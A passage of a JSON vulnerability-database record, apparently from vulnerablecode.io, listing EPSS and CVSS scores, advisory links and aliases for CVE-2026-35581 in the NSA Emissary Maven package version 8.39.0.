26-05-05T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24892","published_at":"2026-04-26T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24848","published_at":"2026-04-29T12:55:00Z"},{"value":"0.00087","scoring_system":"epss","scoring_elements":"0.24903","published_at":"2026-04-24T12:55:00Z"},{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.26244","published_at":"2026-05-15T12:55:00Z"},{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.26192","published_at":"2026-05-09T12:55:00Z"},{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.26118","published_at":"2026-05-11T12:55:00Z"},{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.26136","published_at":"2026-05-12T12:55:00Z"},{"value":"0.00095","scoring_system":"epss","scoring_elements":"0.26218","published_at":"2026-05-14T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35581"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/pull/1290","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/NationalSecurityAgency/emissary/pull/1290"},{"reference_url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-08T14:57:38Z/"}],"url":"https://github.com/NationalSecurityAgency/emissary/security/advisories/GHSA-6c37-7w4p-jg9v"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35581","reference_id":"","reference_type":"","scores":[{"value":"7.2","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35581"},{"reference_url":"https://github.com/advisories/GHSA-6c37-7w4p-jg9v","reference_id":"GHSA-6c37-7w4p-jg9v","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-6c37-7w4p-jg9v"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/1048895?format=json","purl":"pkg:maven/gov.nsa.emissary/emissary@8.39.0","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-fgcj-zvq7-e3ea"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}],"aliases":["CVE-2026-35581","GHSA-6c37-7w4p-jg9v"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vst1-rzvp-9bec"}],"risk_score":"4.0","resource_url":"http://public2.vulnerablecode.io/packages/pkg:maven/gov.nsa.emissary/emissary@8.39.0"}